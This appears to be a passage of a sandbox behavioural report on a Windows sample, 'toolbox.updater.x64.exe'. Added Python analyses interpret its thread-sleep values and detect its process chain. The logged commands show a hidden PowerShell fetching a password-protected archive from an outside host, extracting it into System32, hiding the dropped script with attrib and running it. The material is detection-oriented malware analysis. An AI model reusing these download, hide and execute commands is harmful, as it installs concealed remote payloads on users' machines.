Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477 (4 identical entries)
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Window / User API: threadDelayed 1674
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Window / User API: threadDelayed 1482
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 986
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 775
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 4709
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1784
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 5072 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 4248 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 - Thread sleep count: 1819 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 - Thread sleep count: 986 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076 - Thread sleep count: 1453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404 - Thread sleep count: 775 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956 - Thread sleep time: -1844674407370954s >= -30000s
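Every "Thread sleep time" entry above carries the same value, 922337203685477 (or exactly twice it for TID 6956). That number is 2^63 / 10000: the largest delay a .NET TimeSpan (a signed 64-bit count of 100 ns ticks) can express, in milliseconds. So these entries record waits with no effective timeout rather than sleeps of a chosen length, and whether such a wait is evasive cannot be decided from the number alone; the threads on which the sandbox counted more than 30 delays (TIDs 4500, 1076 and 404) are the ones that look like a timing loop. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses entries in the cleaned one-per-line form used above (the constructed sample reuses the report's values), separates that sentinel from genuinely long timed sleeps, and tallies per thread. The thresholds 30000 and 30 are the report's own; the labels "unbounded", "long", "short" and the verdict field names are mine.

```python
import re
from collections import defaultdict

# Largest delay a .NET TimeSpan (signed 64-bit count of 100 ns ticks) can hold, in ms:
# 2**63 // 10_000 == 922_337_203_685_477, the value repeated throughout the report.
TIMESPAN_MAX_MS = 2**63 // 10_000
LONG_SLEEP_MS = 30_000   # the report's own threshold: "... >= -30000s"
LOOP_COUNT = 30          # the report's own threshold: "... > 30"

# Constructed sample in the cleaned one-entry-per-line form; the values are the report's.
SAMPLE = r"""
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 5072 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 4248 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 - Thread sleep count: 1819 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 - Thread sleep count: 986 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076 - Thread sleep count: 1453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404 - Thread sleep count: 775 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956 - Thread sleep time: -1844674407370954s >= -30000s
"""

SLEEP_TIME = re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) - Thread sleep time: -(?P<ms>\d+)s >= -\d+s$")
SLEEP_COUNT = re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) - Thread sleep count: (?P<n>\d+) > \d+$")


def classify_delay(ms):
    """Read one delay value the way an analyst would, not only against a threshold."""
    k, rem = divmod(ms, TIMESPAN_MAX_MS)
    if rem == 0 and k >= 1:
        # TimeSpan.MaxValue, or (k > 1) several such waits summed for one thread: a wait with
        # no timeout. The number says nothing about how long the code intended to sleep.
        return "unbounded"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def parse(text):
    """Yield (image basename, tid, kind, value) for every sleep-related entry in the text."""
    for line in text.splitlines():
        m = SLEEP_TIME.match(line)
        if m:
            yield m["image"].rsplit("\\", 1)[-1], int(m["tid"]), "time", int(m["ms"])
            continue
        m = SLEEP_COUNT.match(line)
        if m:
            yield m["image"].rsplit("\\", 1)[-1], int(m["tid"]), "count", int(m["n"])


def summarize(text):
    """Per (image, tid): how many unbounded/long/short delays and which loop counts were reported."""
    threads = defaultdict(lambda: {"unbounded": 0, "long": 0, "short": 0, "loop_counts": []})
    for image, tid, kind, value in parse(text):
        rec = threads[(image, tid)]
        if kind == "time":
            rec[classify_delay(value)] += 1
        else:
            rec["loop_counts"].append(value)
    return dict(threads)


def verdict(text):
    """Counts an analyst can act on: timed long sleeps are what the signature is meant to catch,
    unbounded waits need context, and high per-thread delay counts point at a timing loop."""
    s = summarize(text)
    return {
        "unbounded_threads": sum(1 for r in s.values() if r["unbounded"]),
        "timed_long_threads": sum(1 for r in s.values() if r["long"]),
        "looping_threads": sum(1 for r in s.values() if any(n > LOOP_COUNT for n in r["loop_counts"])),
        "max_loop_count": max((n for r in s.values() for n in r["loop_counts"]), default=0),
    }


if __name__ == "__main__":
    for (image, tid), rec in summarize(SAMPLE).items():
        print(f"{image} TID {tid}: {rec}")
    print(verdict(SAMPLE))
```

Run on the sample, no thread shows a timed long sleep; six threads show only the unbounded sentinel and three threads show delay counts above 30, which is the part of this report worth a closer look in the process's own code.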
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug (3 identical entries)
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
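The five process-creation entries above read as one staged loader, all spawned by the sample itself: a PowerShell with a hidden window runs a wget binary at the relative path wget\wget (PowerShell treats a command name containing a path separator as a file path, so this is not its built-in wget alias) to fetch a 7z archive over plain HTTP; a second hidden PowerShell runs a bundled 7za to extract that archive with a password (-p) into C:\Windows\System32\wbem\en-US, overwriting without prompting (-aoa); attrib marks the dropped update.cmd and the directory system, hidden and read-only; and a third PowerShell then runs update.cmd from there. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses exactly those command lines (copied from the entries above as the constructed input) and applies rules of my own naming (hidden_window, cleartext_download, password_protected_archive, extract_into_system32, hide_in_system32, script_from_system32), with "target path under C:\Windows\System32" as an assumed heuristic for an unusual drop location, to recover the download, extract, hide, execute order from the events.

```python
import re

SYSTEM32 = r"c:\windows\system32"                       # assumed drop-location heuristic
STAGES = ("download", "extract", "hide", "execute")
TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")

# Constructed from the five "Process created" entries above: (parent image, child command line).
PROCESS_EVENTS = [
    (r"C:\Users\user\Desktop\toolbox.updater.x64.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q "
     r"--show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5"),
    (r"C:\Users\user\Desktop\toolbox.updater.x64.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za "
     r"x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US"),
    (r"C:\Users\user\Desktop\toolbox.updater.x64.exe",
     r"'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd"),
    (r"C:\Users\user\Desktop\toolbox.updater.x64.exe",
     r"'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US"),
    (r"C:\Users\user\Desktop\toolbox.updater.x64.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd"),
]


def split_cmdline(cmdline):
    """Whitespace-split honouring quoted spans; shlex.split would swallow the backslashes."""
    return [t.strip("'\"") for t in TOKEN.findall(cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def under_system32(path):
    return path.lower().startswith(SYSTEM32 + "\\")


def findings_for(parent, cmdline):
    """Apply the rules to one process-creation event; each hit names the stage it contributes to (or None)."""
    toks = split_cmdline(cmdline)
    image, args = basename(toks[0]), toks[1:]
    low = [a.lower() for a in args]
    hits = []

    def hit(rule, stage, indicator):
        hits.append({"parent": parent, "image": image, "rule": rule, "stage": stage, "indicator": indicator})

    if image == "powershell.exe":
        if "-windowstyle" in low:
            i = low.index("-windowstyle")
            if i + 1 < len(low) and low[i + 1] == "hidden":
                hit("hidden_window", None, "-WindowStyle Hidden")
        # A command name containing a path separator is run as a file path (no alias lookup), so
        # PowerShell here is only a launcher for an external tool or a batch file.
        for a in args:
            if a.lower().endswith((".cmd", ".bat")) and under_system32(a):
                hit("script_from_system32", "execute", a)

    for a in args:
        if a.lower().startswith("http://"):
            hit("cleartext_download", "download", a)

    if any(basename(a) in {"7z", "7za", "7zr", "7z.exe", "7za.exe", "7zr.exe"} for a in args) and "x" in low:
        if any(a.startswith("-p") and len(a) > 2 for a in args):
            hit("password_protected_archive", None, "-p<password>")   # password itself deliberately not echoed
        for a in args:
            if a.startswith("-o") and under_system32(a[2:]):
                hit("extract_into_system32", "extract", a[2:])

    if image == "attrib.exe" and {"+s", "+h"} <= set(low) and under_system32(args[-1]):
        hit("hide_in_system32", "hide", args[-1])

    return hits


def analyze(events):
    return [f for parent, cmd in events for f in findings_for(parent, cmd)]


def staged_chain(events):
    """Stages in first-seen order; all four from one parent, in this order, is the fetch/unpack/hide/run pattern."""
    seen = []
    for f in analyze(events):
        if f["stage"] and f["stage"] not in seen:
            seen.append(f["stage"])
    return seen


def is_full_chain(events):
    return tuple(staged_chain(events)) == STAGES and len({f["parent"] for f in analyze(events)}) == 1


if __name__ == "__main__":
    for f in analyze(PROCESS_EVENTS):
        print(f"{f['rule']:28} stage={f['stage']!s:9} {f['indicator']}")
    print("chain:", " > ".join(staged_chain(PROCESS_EVENTS)), "| full chain:", is_full_chain(PROCESS_EVENTS))
```

The same rules can be run over Sysmon event ID 1 or EDR process-creation telemetry by feeding (ParentImage, CommandLine) pairs instead of the constructed list; the order check matters, because an isolated attrib +S +H on a System32 path or a lone password-protected extraction is common in legitimate installers, while the full sequence from one non-installer parent is not.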
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Queries volume information: C:\Users\user\Desktop\toolbox.updater.x64.exe VolumeInformation
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
